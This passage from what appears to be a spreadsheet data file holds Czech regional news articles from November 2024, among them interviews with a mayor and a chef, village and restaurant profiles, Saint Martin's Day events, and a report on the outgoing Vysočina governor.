zapůjčuje občanům. Díky dotacím se podařilo nakoupit a zapůjčit do domácností kompostéry. Průzkumy ukazují, že až 30 % objemu v černé nádobě tvoří bioodpad. Pokud se nám podaří naučit lidi, aby domácí bioodpad kompostovali, nejen že si vyrobíhumus do truhlíků nebo záhonů, ale sníží i obci náklady na likvidaci komunálu. Jak jste přežili povodně? Musím říct,že přestože se místní toky iOlše, která teče včásti Podobora , vylily z břehů, zaplavené sklepy byly pouze v jednotlivých případech a nezaznamenal jsem nějaké významné škody na majetku občanů. Loni jsme realizovali velkou investiční akci, čištění a reprofilaci břehů místního roku Loucká Mlýnka. Jsme rádi, že vynaložené finance do preventivních opatření nebyly marné apodařilo se nám tak ochránit majetek občanů. A co dál? Na obci bude vždycky práce dost anikdy nebude hotovo. Takže přeji sobě i zastupitelům, abychom byli vnímaví k tomu,co je zapotřebí kde opravit, postavit nebo rekonstruovat,aaby se nám to společně dařilo realizovat. www.chotebuz.cz DavidHarok, starosta obce Chotěbuz</t>
  </si>
  <si>
    <t>20241101_706_3239764457_1b9976faea6252fd2670.html</t>
  </si>
  <si>
    <t>1b9976faea6252fd2670</t>
  </si>
  <si>
    <t>„Chci vyzdvihnout opomíjené klasiky, které však mají lidé rádi“</t>
  </si>
  <si>
    <t>„Chci vyzdvihnout opomíjené klasiky, které však mají lidé rádi“ Vrací se rád k tradičním pokrmům a zpestřuje je asijskými či severskými komponenty. Šéfkuchař restaurace Goldie v táborském boutique hotelu Nautilus Martin Košťál v současnosti ale především slaví. Před několika týdny se mu narodil syn Matyáš. V gastronomii se devětatřicetiletý kuchař pohybuje už od dvaceti let. Martin Košťál si řemeslo zkusil v Itálii či Rakousku , jižní Čechy jsou ale pro suchdolského rodáka srdeční záležitostí. Jeho lahodné pokrmy mohli ochutnat návštěvníci restaurací v Hluboké nad Vltavou i Českých Budějovicích . „V covidové době to bylo nejen v gastru hodně divoké. Já hledal místo a hotel Nautilus kuchaře. Takže jsme se hezky našli,“ popisuje Martin Košťál , který byl také rok členem Národního týmu kuchařů a cukrářů ČR. „Nebylo to úplně pro mě, nejsem soutěžní kuchař, ale rád na to vzpomínám a kluci dělají skvělou práci,“ dodal kuchař, který rád hraje fotbal, fotí a chodí na procházky se psy. Můžete porovnat zahraniční a tuzemskou gastronomii? Kde vám nejvíce chutnalo? Na stážích jsem byl mladý a nebyly to úplně michelinské restaurace, ale vařilo se tam lokálně. To na mě tehdy zapůsobilo a zůstalo to ve mně. Kde mi vyloženě chutnalo, tak bylo v Paříži , třeba u šéfkuchaře Joela Robuchona, nebo v tamní vyhlášené čínské restauraci. Tam jsem jedl nejlepší pekingskou kachnu, kterou jsem kdy měl. Takže jste milovník asijské? Jednou začas určitě. Nejraději vařím fúze, například evropsko-asijskou, nebo kombinace se severskou kuchyní, to mě hodně baví a pracujeme s tím i v Goldie restauraci. Co mám rád k jídlu, tak je houbová omáčka se štercem od mojí mámy. Šterc je taková slaná bramborová trhaná placka, k tomu máma dělala sladkokyselou omáčku z čerstvých hub. To je pro mě top! Maminka mě inspirovala a občas se to objeví u nás na jídelním lístku, teď je zrovna to houbové období. Zmínil jste lokálnost, která je trendy, ač se tak dříve vařilo běžně. Jak vy to vnímáte a jak s tím pracujete? Přesně, bylo to kdysi standardní, normální. Až s nástupem velkých supermarketů se stalo nakupování zásob superrychlé a pohodlné. Každý s tím začal pracovat. A dnes se vracíme zpět k menším dodavatelům. V Nautilu vaříme ze 65 procent z lokálních surovin, jen suchý sklad zásobujeme od velkoprodejců – soli, cukry. I když už třeba octy, mák, koření bereme od místních farmářů a pěstitelů. Můžu zmínit farmu Mezi řádky od Mladé Vožice , Naše zahrada od Zvíkova , maso ze Statku Netěchovice, sýry a klobásky z Horních Dvorců. Dále ryby ze Štičí líhně Esox Tábor nebo šumavského Pstruhařství Mlýny, které je vyhlášené jesetery. Ten se mimochodem objeví na novém, podzimním menu. Nejsme s lokálností na 100 procentech a nevím, zda je to reálné, ale blížíme se tomu a usilujeme o to. Když máte kvalitní surovinu, tak jídlo chutná samo o sobě skvěle. Než se vrátíme k menu, zůstaneme ještě v kuchyni. Na co se soustředíte, na čem si zakládáte? Navázal jsem na předchozí kuchaře a zaměřujeme se na českou kuchyni. Nechci říct úplně tradiční, ale moderní, kde se snažím fúzovat. Občas použiji komponenty ze severské, asijské či francouzské kuchyně. Rád si hraju s tím, že tradiční české omáčky začleňuji do večerní á la carte menu – svíčkovou či znojemskou, pěkně udělanou s hovězím hrudí, ricottovým knedlíčkem a vlastními nakládanými okurkami. Specialitou je drahá věc, která však stojí za to! Je jí steak Rossini s játry foie gras a strouhanými čerstvými lanýži. To je zážitek. Snažíme se jídla dělat dobře a zábavně. Co by návštěvník tedy neměl z vašeho jídelníčku vynechat? Nic! Měl by postupně ochutnat vše. Máme skvělý, školený servis, rád něco doporučí a se zákazníkem najde kompromis, když někdo nejí maso, nebo naopak nemusí moc zeleniny. A když se stane, že si třeba klient nevybere z jídelního lístku, rádi se domluvíme a splníme jeho přání. Vždy je to o komunikaci. Vaříte i obědová meníčka? Máme polední menu, cenově jsme velmi přívětiví a pohybujeme se v podobných částkách okolních restaurací. Večerní lístek je samozřejmě o něco dražší, protože se používají dražší vstupní suroviny a je dbán větší důraz na servis. Platí však, že se k nám mohou dojít lidé kvalitně najíst za rozumný peníz i přes obědy. Občas se možná stane, že se do kuchyně vrátí nevylízaný talíř… Vždy se hned ptám servisu, co se stalo. Na hostu a jeho spokojenosti nám záleží. Většinou je to naštěstí tak, že lidé třeba měli čtyřchod nebo šestichod a už to nemohli sníst. V médiích a foodblozích se vždy objevuje, co je aktuálně v gastru „in“. Mně by spíš zajímalo, co „frčí“ mezi lidmi, co by rádi jedli? Obecně mám pocit, že by lidé jedli nejraději jenom smažák. (smích) Trendy celkově je smažené. Na polední menu si prakticky nedovolím nedat nesmaženou věc. To by nás hosté ukousali. Vždy tam něco je a je jedno co – oblíbený je kromě sýra i smažený celer, květák či cuketa, klasický řízek, karbanátky, pštrosí vejce. Mají to prostě rádi a já se smažené občas snažím hodit i na večerní menu – nyní aktuálně třeba ochutnáte muflona s rakytníkem a smaženým květákem. A je to jedno z nejoblíbenějších jídel. Napište někde „smažený“ a máte vyhráno. Čím si tuto malou skrytou pravdu vysvětlujete? Podle mě se doma lidé snaží jíst zdravě a v restauraci si snáze ospravedlňují to, že to není úplně zdravé, ale jednou začas můžou. Chtějí zkrátka zhřešit. Jak bude vypadat aktuální menu podzim/zima v Nautilu? Zaměříme se na jednoduchost. Návštěvníci v něm najdou vuřt na pivě , zelňáky, ale i bramborový croissant s kaviárem. Kulajdu budu dělat tradičně bez experimentování, najdou tu táborskou baštu z presovaného bůčku z Netěchovic, s klobáskami z Horních Dvorců, pečeného zelí a knedlíkem plněným uzeným. Nebude chybět ani zvěřina, například s uzeným tvarohem či perníkem. Dezertem bude šlehaný tvaroh s mandlovicí, sušenými malinami a sušenými krekry z jogurtu z Farmy Slapsko. V listopadu u nás najdete svatomartinskou husu. Zkrátka tradičně netradičně. Chci vyzdvihnout starší opomíjené klasiky, které však lidé mají rádi. Kromě fúzí, experimentujete rád v kuchyni? V nedávné době se používal často dusík a makromolekulární prvky… Ale ano, jen na to musí mít člověk lidi, kteří to dokážou koupit a ocenit. Takže spíše na degustacích. Na poledním či večerním menu to nejde, protože se lidé neznámého bojí, a stačí jen neznámý název v meníčku. Dusík, makromolekulární kuchyně a jiné jsou už myslím za zenitem. Já ve finále nejraději experimentuji s chutěmi. Moc mě baví třeba umami, kterou moc lidí nezná. Máte vůbec čas na účast na gastroakcích, soutěžích a podobně? Každý rok se kolem března, dubna zapojujeme do Táborského festivalu vína a vždy se na něj těšíme. Od podzimu na něj vymýšlíme speciální menu snoubené se skvělými víny od prima vinařů z Čech a Moravy . Bohužel je vždy kapacita omezená a vstupenky rychle zmizí. U soutěží jsem si musel vybrat, zda budu soutěžní kuchař, nebo se budu soustředit na restauraci. Obojí moc dohromady kvalitně nejde. A u mě vyhrála restaurace. Ale dělám i lektora vaření, kdy dvakrát třikrát do měsíce učím na kurzech.</t>
  </si>
  <si>
    <t>20241101_707_3239764219_93240d27dce6e83d43b3.html</t>
  </si>
  <si>
    <t>93240d27dce6e83d43b3</t>
  </si>
  <si>
    <t>V Bistru U Dvou přátel je prima</t>
  </si>
  <si>
    <t>V Bistru U Dvou přátel je prima Dva kamarádi, díky jejichž kuchařskému umění můžete poznat streetfoodový svět, mají své sympatické bistro jen kousek od Polikliniky Jih v Českých Budějovicích . Marek a Viktor se poznali v jedné z restaurací v Českých Budějovicích před 15 lety a na podzim otevřeli své vysněné Bistro U Dvou přátel. Krásné prostory vás zvou jak na rychlý oběd v práci, pracovní schůzku, tak i na firemní večírky nebo rodinné oslavy. A jeho dva majitelé se snaží, aby se jejich nadšení, dobrá nálada, ale i kuchařský um odrážely v jejich jídle. Na jakou kuchyni k vám mohou milovníci jídla vyrazit? Mohou k nám vyrazit na mexickou kuchyni, žebírka, burgery z netradičních mas. Nabízíme samozřejmě i polední menu pro lidi z firem v okolí Lidické třídy. Naše jídla jsou hodně inspirovaná streetfoodem a odráží se to v nich i tím, jak jsou neobvyklá a ze surovin, které byste tam možná úplně nečekali. Jako třeba náš oblíbený bizoní burger, který máme vymazlený a je hvězdou našeho menu. Nezklameme ani milovníky piva . Pivovar Samson je naším skvělým dodavatelem několika druhů jejich piva . Má váš název spojitost s kultovním filmem Drž hubu? To rozhodně má. Stejně jako Kentán měl sen o bistru, tak Marek také. Takže při rozhodování o názvu byl tenhle kultovní film jednoznačně inspirací. V práci si ale nenadáváme! Jsme s Markem sehraný tým, který spojuje láska ke gastronomii. Vládne u nás skvělá atmosféra a lidé k nám přicházejí s úsměvem. Jak to máte s lokálností surovin? Snažíme se o to, aby bylo jídlo co nejvíce lokální. Jižní Čechy jsou naše srdcovka, aproto sesnažíme podporovat lokální výrobce a pěstitele. Například bizoní maso máme z farmy Rožnov za Kunžakem . Máme v plánu si nechat vychovat i vlastního býka na farmě v Rančicích. Navštěvovat jej ale asi nebudeme, těžko bychom jej pak dokázali servírovat.</t>
  </si>
  <si>
    <t>20241101_708_3239760822_d7e9cad7d5647f912535.html</t>
  </si>
  <si>
    <t>d7e9cad7d5647f912535</t>
  </si>
  <si>
    <t>„Tady pramení výhody“ – Karta občana – LISTOPAD 2024</t>
  </si>
  <si>
    <t>„Tady pramení výhody“ – Karta občana – LISTOPAD 2024 • 20 % sleva na akce pořádané Kulturním a kongresovým centrem Elektra • 10 % sleva na jednorázové vstupné do Městské plovárny • 10 % sleva z nákupu na všechny druhy oplatků a dárkového zboží v obchodech Oplatky Clip • 10 % sleva z jednorázového vstupného na sportovní a regenerační služby ve Sportovním centru Radostova • Vstup zdarma na Diskotéku Elektra • Kofola zdarma k obědovému menu v restauraci Elektra • 15 % sleva na pivo v PET lahvích a 7 % na sud v Lázeňském pivovaru • 50 % sleva na komentované prohlídky s ochutnávkou v Lázeňském pivovaru Tady pramení výhody — program města Luhačovice pro občany.</t>
  </si>
  <si>
    <t>20241101_709_3282573541_2c8cb091c61f6d919fd1.html</t>
  </si>
  <si>
    <t>2c8cb091c61f6d919fd1</t>
  </si>
  <si>
    <t>SVATÝ MARTIN ZVE NA OCHUTNÁVKU NOVÝCH VÍN I TRADIČNÍCH SVATOMARTINSKÝCH DOBROT</t>
  </si>
  <si>
    <t>SVATÝ MARTIN ZVE NA OCHUTNÁVKU NOVÝCH VÍN I TRADIČNÍCH SVATOMARTINSKÝCH DOBROT Rubrika: SPOLEČNOST, KULTURA Dům kultury v Kroměříži připravuje ve spolupráci s městem Kroměříží na poslední měsíce roku hned několik oblíbených a hojně navštěvovaných akcí. „V průběhu listopadu se mohou obyvatelé i návštěvníci města těšit na Svatomartinské hodování a rozsvícení vánočního stromu před budovou radnice, prosinec se pak ponese – jako již každoročně – v duchu vánočních trhů Šťastné a veselé na Velkém náměstí a připravené je také silvestrovské rozloučení se starým rokem koncertem a ohňostrojem,“ shrnul nejvýznamnější chystané akce radní Jiří Kašík . Tradiční datum 11. 11. je termínem Svatomartinského hodování. Slavnost doprovázená jarmarkem plným stánků s více či méně tradičním sortimentem, v němž nechybí zabijačkové a husí speciality, a především nová letošní vína , se uskuteční na Hanáckém náměstí. Součástí programu bude 11 minut po 11. hodině otevření a žehnání prvního svatomartinského vína za účasti zástupců vedení města a ochutnávka mladých vín nalévaných samotným svatým Martinem ve stylové zbroji. Návštěvníkům budou hrát k poslechu hned dvě cimbálovky – dopoledne Cimbálová muzika Lintava a odpoledne Cimbálová muzika Josefa Marečka. Mezi hudebními vstupy pobaví přítomné lidový vypravěč a pro děti je připravený program s názvem Zpívánky strýčka Líčka. Jarmark s hudebním doprovodem probíhá od 10 do 18 hodin. Po 18. hodině se vydá na cestu z Hanáckého náměstí svatomartinský průvod, který zamíří na Velké náměstí, kde bude pokračovat program pro rodiny s dětmi, který tradičně připravují dobrovolníci a farníci od sv. Mořice . Ilustrační Foto: T. foto Vrtal Autor: (šak) Autor person šak Rubrika transition_slide SPOLEČNOST, KULTURA</t>
  </si>
  <si>
    <t>20241101_71_3264616406_2657ec264fa7e5c86862.html</t>
  </si>
  <si>
    <t>2657ec264fa7e5c86862</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté na Dalešické přehradě vychutnají i z paluby lodi Skalnaté břehy zasazené do podzimních rámů z barevného listí, opuštěné pramice, kormoráni odpočívající na borovicích, pár rybářů. Takové scenerie nyní nabízí okolí Dalešické přehrady . Lidé se přírodou mohou kochat rovnou z vodní hladiny. Stačí nastoupit na výletní loď Horácko . Nádrž brázdí i na podzim a v zimě. „Příroda teď opravdu hýří všemi barvami, všechno je krásně zbarvené – od žluté, oranžové a hnědé až po tóny červené. Když do toho zasvítí i sluníčko, je to nádhera. A oproti létu je tady teď samozřejmě výrazně klidněji,“ popisuje atmosféru kolem vodního díla Milan Jahoda, dlouholetý kapitán výletní lodi Horácko . 12 fotografií Uplynulý víkend se měly konat již poslední pravidelné plavby, vzhledem k příznivé předpovědi počasí ale vyrazí loď na projížďku ještě tuto sobotu 2. listopadu. Vypluje opět z přístaviště Kramolín, a to hodinu po poledni. Do cílového Koněšína dorazí plavidlo za pětašedesát minut a po otočení se vrací zase zpět do kramolínského přístaviště. Zájemci tak mohou na palubě strávit klidně i více než dvě hodiny, anebo se svézt pouze mezi některými stanicemi na trase. Mnozí výletníci volí kombinaci chůze a plavby – nechají se třeba kousek „popovézt“ lodí a zpáteční trasu potom absolvují pěšky. Na Martina se bude na palubě otevírat víno Ani pro nadcházející podzimní a zimní období však sezona vyjížděk ještě zdaleka nekončí. Na svátek svatého Martina , tedy na pondělí 11. listopadu, je v plánu tradiční Svatomartinská plavba. „Je to akce, která se koná už dlouhé roky. Vynechali jsme snad jenom jednou, když ji nebylo možné uspořádat kvůli covidu,“ líčí kapitán. Vyjížďka, jež startuje v deset hodin ráno, je spojena s obligátním otevřením a ochutnávkou letošních mladých svěžích vín pocházejících ze Sádku, jediné vinice a vinařství na Vysočině. Otevřou je podle tradice – přesně jedenáct minut po jedenácté hodině dopolední. OBRAZEM: Loď Horácko na Dalešické přehradě převezla už deset tisíc lidí „Chybět nebude ani porcička netradičně upravené svatomartinské husy a mnohé další dobroty,“ popisuje Milan Jahoda. Ten se těší hlavně na přátelskou atmosféru, s níž je akce vždycky spojena, neboť na ni řada lidí míří již opakovaně. „A z mnohých návštěvníků se tak nakonec postupně stali i naši přátelé,“ usmívá se kapitán. Účast je potřeba si předem rezervovat, podle Jahody však ještě nějaká volná místa jsou. Zajímavé a netradiční zpestření konce roku Na další plavbu se mohou zájemci vydat v neděli 17. listopadu. A loď nebude zahálet ani v prosinci. Dalešice jsou přečerpávací nádrží, a hladina tak v zimě nikdy zcela nezamrzá. Horácko tudíž může přislíbit vyjížďky i na 26. prosinec, silvestr či na Nový rok. „Tyto zimní termíny si u lidí získaly oblibu. Na Štěpána už mají lidé dost cukroví, pohádek i návštěv a rádi si svátky zpestří třeba právě plavbou. A přelom roku je zase zajímavým a netradičním vstupem do dalšího období,“ shrnul Jahoda s tím, že v případě příznivého počasí není ani vyloučeno, že bude ještě nějaký další termín plaveb vypsán. Mapy poskytuje © SHOCart a přispěvatelé OpenStreetMap. Společnost SHOCart je tradiční vydavatel turistických a cykloturistických map a atlasů. Více na www.shocart.cz Autor: Jana Nedělková Autor person Jana Nedělková Rubrika transition_slide Rádio Impuls - Vysočina</t>
  </si>
  <si>
    <t>20241101_710_3288661829_2906c7363549de695141.html</t>
  </si>
  <si>
    <t>2906c7363549de695141</t>
  </si>
  <si>
    <t>Sušice</t>
  </si>
  <si>
    <t>Sušice Rubrika: U NÁS NA VESNICI I v listopadu pokračuje v Magazínu21 putování po obcích, které uspěly v letošním ročníku soutěže Vesnice roku Zlínského kraje. Tentokrát vás zavedeme do okresu Uherské Hradiště , kde najdeme obec Sušice . Ta získala Zelenou stuhu za péči o zeleň, krajinu, veřejná prostranství a životní prostředí. Ocenění spolu s finanční odměnou si vysloužila moderním, profesionálním a citlivým přístupem k rozvoji veřejných prostranství, zeleně v obci a krajinných prvků v zemědělské krajině. Malebnou slováckou obec s necelými sedmi stovkami obyvatel najdeme jen pár kilometrů severně od Uherského Hradiště . První písemná zmínka, která dokládá existenci obce, pochází z roku 1344. Ovšem archeologické nálezy dokazují, že lidé si toto místo k životu vybrali už dávno předtím v době kamenné. Místní samospráva se soustředí zejména na obnovu obce a rozvoj místní kultury a tradic. V posledních letech se zde podařilo opravit sportovní areál s moderním tenisovým kurtem, celkovou rekonstrukcí prošla budova bývalé školy, kde dnes najdeme obecní úřad se společenským sálem, mateřskou školu a veřejnou knihovnu. Vedení obce nezapomnělo ani na místní dobrovolné hasiče a zajistilo rekonstrukci hasičské zbrojnice. Stejně jako o veřejná prostranství se obec stará o své drobné památky – o kapli Panny Marie, kříže a pomníky. Velký význam pro obec má její společenský život. Nejvýznamnější společenskou událostí jsou zde Mariánské hody s právem, které byly obnoveny v roce 2010 po dlouhých 41 letech. Na paletě sušických akcí dále najdeme pouť, masopust, dětský den, večerní zábavy na hřišti nebo vánoční besídku. Sušičané se tradičně zapojují do krojovaného průvodu na Slováckých slavnostech vína a otevřených památek v Uherském Hradišti . Kdo se chce věnovat sportu, má na vybranou fotbal, futsal, stolní i klasický tenis nebo jógu. Turisté se mohou ze Sušic vydat pěšky nebo na kole za přírodními krásami nedalekých Chřibů či Baťova kanálu. Daleko to nebudou mít ani na Velehrad , do Archeoskanzenu na Modré, do Památníku Velké Moravy či Kovozoo ve Starém Městě , do královského města Uherské Hradiště a na mnohá další malebná místa, kterých je Slovácko doslova plné. A kterou obec vám představíme v příštím vydání našeho časopisu? Bude to vesnice, která v soutěži Vesnice roku ve Zlínském kraji získala Fialovou stuhu, tedy ocenění pro inovativní obec. Vydáme se do Bílých Karpat , kde nedaleko Slavičína leží obec s necelými třemi stovkami obyvatel. Příště vás pozveme do Rudimova . ⬛ ↑ OBECNÍ ÚŘAD. Ačkoliv nápis na štítu budovy praví, že se jedná o školu, dnes zde najdeme obecní úřad se společenským sálem, ale také mateřskou školu a místní knihovnu. ↑ ZELEŇ A VEŘEJNÁ PROSTRANSTVÍ. Zelenou stuhu si obec vysloužila svým přístupem k rozvoji veřejných prostranství, zeleně v obci a krajinných prvků v zemědělské krajině. ↑ TRASY. Sušicemi prochází zelená turistická trasa, která vede až na hlavní hřeben Chřibů k Bunči. Přes obec vede i několik cyklotras, v plánu je také připojení na cyklostezku podél Baťova kanálu. Fakta o obci okres: Uherské Hradiště starostka: Ladislava Vlachynská počet obyvatel: 670 počet domů: 219 rozloha: 188 ha nadmořská výška: 202 m n. m. web: www.obecsusice.com Zajímavost Podle archeologických nálezů byla místa, kde se dnes nachází obec Sušice , osídlena už v nejstarší době kamenné, tedy přibližně před 80 tisíci lety. Díky tomu jsou Sušice nejstarším doloženým osídlením v celém Zlínském kraji. Nálezy z průzkumu profesora Viléma Hrubého jsou dnes uloženy ve Slováckém muzeu v Uherském Hradišti . Tři otázky pro starostku Ladislavu Vlachynskou Kdyby se vaše obec měla zapsat do knihy rekordů, v čem by vynikala? Naše obec leží na tak krásném místě, že si ji za svůj domov vybrali naši předkové už v nejstarší době kamenné. A podle archeologů jsou Sušice vůbec nejdéle prokazatelně osídleným místem celého našeho kraje. My se snažíme, aby se u nás lidem dobře žilo i dnes. Které místo tu máte nejraději a proč? Miluji zeleň, jsem romantik a snílek, moc ráda pozoruji západ slunce nad Sušicemi a celé okolí, když hraje všemi barvami. Kdybyste měla neomezený rozpočet, co byste v obci udělala? Jako první bych chtěla zastřešení sportovního areálu, kde probíhají všechny kulturní akce a vždy čekáme, zda k nám bude počasí vlídné, či budeme muset akci přesunout. Ale je toho mnohem víc, co by bylo ještě třeba vybudovat a obec posunout dopředu. Ale držím se hesla: „Jedeme dál!“ Smyslem soutěže Vesnice roku je povzbudit obyvatele venkova k aktivnímu zapojení do rozvoje svého domova, popularizovat rozmanitost a pestrost obnovy vesnic a vyzdvihnout význam venkova. Více informací najdete na www.vesniceroku.cz (dos) Rubrika transition_slide U NÁS NA VESNICI</t>
  </si>
  <si>
    <t>260000</t>
  </si>
  <si>
    <t>20241101_711_3288646617_a6674e2ff1849033a1e3.html</t>
  </si>
  <si>
    <t>a6674e2ff1849033a1e3</t>
  </si>
  <si>
    <t>Vyrostu až na kraj: Klára Svitková</t>
  </si>
  <si>
    <t>Vyrostu až na kraj: Klára Svitková Jaké je pracovat na Krajském úřadě Zlínského kraje ? To přibližuje kampaň Vyrostu až na kraj, která představuje profesní příběhy vybraných zaměstnanců úřadu. Jednou z tváří je i Klára Svitková, specialistka integrované prevence z odboru životního prostředí a zemědělství. Proč jste se rozhodla pracovat pro Zlínský kraj? Když jsem při studiu vysoké školy jednou jela kolem Jednadvacítky, řekla jsem si: „Tady bych jednou chtěla pracovat“. Byl to takový můj sen, o kterém nikdo nevěděl. A tak jako zraje víno , zrála i má cesta na kraj. A teď jsem tady. I přesto, že jsem tu zatím jen krátce, vím, že moje práce má smysl a mohu něco ovlivnit. Hlavně ve svém oboru, který je zaměřen na oblast ochrany životního prostředí. Co se můžete ještě naučit? Určitě bych se chtěla zdokonalit nejen ve své práci a svém oboru, ale také se posunout v osobnostní rovině. Krajský úřad mi poskytuje celou škálu možností pro mou profesní realizaci. Kromě toho, že se ve své agendě zdokonaluji, mám možnost využívat celou řadu školení, které mi přinášejí nový vhled do mého oboru. Zároveň mám možnost zvyšovat si kvalifikaci v odvětví, které mě baví a zajímá. Jaký je Zlínský kraj zaměstnavatel? Vítám to, že poskytuje různé benefity, ať už je to benefitní účet, flexibilní pracovní doba, osobní volno nebo možnost občasné práce z domu. Oceňuji i snahu vycházet zaměstnancům vstříc, a to nejen v pracovním prostředí, ale i formou vzdělávacích, kulturních či jiných zájmových akcí pro zaměstnance. Jací jsou kolegové, se kterými spolupracujete? Co na nich oceňujete? Na kolegy nedám dopustit, jsem opravdu ráda, za to, do jakého kolektivu jsem se dostala. Všichni na našem odboru jsou ochotní a kamarádští, což rozhodně ovlivní to, jak se člověk v práci cítí. Oceňuji především jejich profesionalitu, jsou to lidé na svém místě. Kdykoliv se na ně obrátím s prosbou o pomoc, jsou se svými zkušenostmi schopni mi kompetentně odpovědět a poradit. Co byste doporučila zájemcům o práci na úřadě? Rozhodně nebát se to zkusit. Práce zde vás posune zase o kus dál. Je tu příjemné pracovní prostředí, skvělí a ochotní kolegové, kteří odvádí svou práci pečlivě a vy se můžete stát součástí jejich týmu. ⬛ (aga) ↑ Podílejte se také vy na rozvoji sebe i svého regionu. Pracujte pro #krajbezhranic! Podívejte se, koho právě hledáme.</t>
  </si>
  <si>
    <t>20241101_712_3239764674_1b01edbf8f5b29a7561d.html</t>
  </si>
  <si>
    <t>1b01edbf8f5b29a7561d</t>
  </si>
  <si>
    <t>Dovolená MÍSTO CIGARET</t>
  </si>
  <si>
    <t>Dovolená MÍSTO CIGARET Adam, můj muž, kouřil, co ho znám. A svého zlozvyku se tvrdošíjně odmítal vzdát. Nakonec se mu to povedlo – díky naší vnučce. Jana, 67 let manžel ji překvapil Letos bylo manželovi šedesát devět let. Od dvaceti kouřil a za ta léta nedokázal s cigaretami skoncovat. „Covid jsem měl třikrát a vždy s lehkým průběhem, do kopců vyjdu na rozdíl od tebe bez zadýchání a plíce mám podle rentgenů v pořádku! Kromě cigárka a pár piv jednou za týden nemám žádný hřích. Sportuji, jím rozumně, nemám nadváhu, tak mi aspoň to kouření nech!“ slýchala jsem od Adama pravidelně, když jsem si dovolila říct mu cokoli na adresu jeho zlozvyku. Je pravda, že manžel je kuřák, ale i sportovec, celý život hraje fotbal, a to i nyní v důchodu! Mnohdy je na tom fyzicky lépe než o mnoho mladší chlapi. „To víš, Janičko, geny jsou geny, ty se nezapřou!“ opakoval mi často svůj další prokuřácký argument. Manželova maminka tu s námi totiž byla do pětadevadesáti a až poslední půlrok svého života nebyla plně soběstačná. Její maminka se dokonce dožila rovné stovky! Celé roky jsem na muže měla jen jedinou páku a tou byla finanční stránka kouření. V posledních letech šlo o docela velké peníze. Během jednoho roku bychom za to měli našetřeno na krásnou dovolenou pro dva u moře. Ale co se mně nepovedlo za dvacet let, povedlo se neplánovaně naší vnučce. „Jano, víš, že Romanka kouří? A Dana ji nechá, chápeš to? Sedmnáctiletou holku! Ruce bych jí urazil!“ řekl mi zhruba před rokem vytočený manžel. Ta zpráva byla novinou i pro mě, ale dceru jsem chápala, jak zakázat sedmnáctileté holce kouření? Vnučka chodí od patnácti po brigádách, vydělá si za měsíc docela hezké peníze. Školu nezanedbává, doma pomáhá a peníze jí na cigarety nikdo nedává. Dcera jí pochopitelně nedovolí kouřit doma, ale pokud si dá cigaretu na zahradě, do toho jí už nemluví. Hádaly by se, nic by to nevyřešilo a pokazily by si hezký vztah, který jinak mají. Vztah, jako má Dana s Romankou, se opravdu hned tak u někoho nevidí! Ve stejném duchu jsem o všem několikrát mluvila i s mužem. Nakonec se mnou kupodivu souhlasil. „Asi máš pravdu, Jani, ale víš co? Ode dneška přestávám kouřit já! Jsem jediný, koho Romana vídala odmala kouřit. Mám výčitky, dělal jsem jí v podstatě tátu, neměla mě s tím cigárem vídat!“ šokoval mě muž, který se spontánně rozhodl se svým zlozvykem skoncovat. Adam byl příkladný dědeček, dcera byla mnoho let sama, její bývalý muž nejen pil, ale také ji i několikrát zbil. S naší pomocí od něj nakonec utekla. Manžel se snažil, co mohl, aby vnučce tatínka nahradil. Měli spolu moc pěkný vztah. Když jsem pak vše řekla Daně a ta své dceři, sázely jsme se, jak dlouho to děda vydrží. Nevyhrály jsme ani jedna. Adam je totiž bez cigarety už rok! A jeho milovaná vnučka jedenáct měsíců. Poté, co manžel vydržel první měsíc, oznámila doma vnučka: „Když to vydržel děda, zvládnu to také!“ Manžel z toho měl takovou radost, že jí řekl, že když to vydrží rok, dá jí peníze, které na cigaretách za celý rok ušetří. A to také udělal! Vnučka nás pak velmi dojala. Peníze nejprve nechtěla přijmout, bylo to přes třicet tisíc! Nakonec je přijala, ale ne pro sebe! Celou rodinu pozvala na víkend do Říma ! Říct ne jsme nemohli. Všechno zařídila, koupila letenky, zajistila ubytování se snídaní, přidělila každému kapesné a dělala nám průvodkyni. Užili jsme si to všichni báječně. A bez cigaret. Manžel měl velké výčitky, že za vnuččino kouření může on. V příběhu byla změněna jména. Ilustrační foto: Shutterstock</t>
  </si>
  <si>
    <t>20241101_713_3239774223_bd0db03434024f0e9c5c.html</t>
  </si>
  <si>
    <t>bd0db03434024f0e9c5c</t>
  </si>
  <si>
    <t>Noc venku – problematika bezdomovectví</t>
  </si>
  <si>
    <t>20241101_714_3239774801_8c323650a79f812c60aa.html</t>
  </si>
  <si>
    <t>8c323650a79f812c60aa</t>
  </si>
  <si>
    <t>Končící hejtman Schrek se za seniory domova ve „Velmezu“ nevrátí</t>
  </si>
  <si>
    <t>Končící hejtman Schrek se za seniory domova ve „Velmezu“ nevrátí Ustavující zastupitelstvo na kraji bude v pondělí volit hejtmanem Martina Kuklu (ANO). Končící hejtman Schrek se vzdal místa ředitele Domova pro seniory ve Velkém Meziříčí . Krajští zastupitelé se na svém ustavujícím jednání sejdou v pondělí 4. listopadu od 10 hodin v sídle kraje v Jihlavě . Novinářům to oznámil hejtman kraje Vítězslav Schrek ( ODS +STO). Volby do krajských zastupitelstev se sice uskutečnily v druhé polovině září, ale Krajský soud v Brně musel řešit dvě žaloby namířené proti volebním výsledkům. Soud výsledky potvrdil. „Ve chvíli, kdy byl soudem oznámen výsledek o platnosti voleb, tak byl limit, že nejméně deset následujících dnů může být svoláno zastupitelstvo, nejdéle do 15 dnů,“ informoval na dotaz JL hejtman kraje Vítězslav Schrek ( ODS +STO). Doplnil, že jako optimální termín se jevilo právě pondělí 4. listopadu. „Je to vlastně nejbližší možný termín tak, aby vyhověl zákonu,“ navázal ředitel krajského úřadu Zdeněk Kadlec. Vítězslav Schrek tak má za sebou poslední dny svého hejtmanského mandátu. Mimořádné zastupitelstvo v pondělí ještě zahájí, v průběhu jednání předá otěže řízení schůze do rukou svého zvoleného zástupce. Nyní je již jasné, že se nevrátí na svou předchozí pracovní pozici ředitele Domova pro seniory ve Velkém Meziříčí . „Já jsem se této pracovní pozice vzdal,“ sdělil novinářům. Hledá nové místo Jak Schrek upřesnil, na základě jeho oznámení byla oficiálně do funkce ředitelky jmenována Šárka Kubátová. „Důvod je jednoduchý, zákon o volbách do krajských zastupitelstev neumožňuje souběh mandátu krajského zastupitele zároveň s funkcí ředitele příspěvkové organizace,“ vysvětlil končící vysočinský hejtman s tím, že se rozhodl následující čtyři roky vykonávat funkci krajského zastupitele. Jedná se však o neuvolněnou funkci, ke které si bude muset najít práci na hlavní 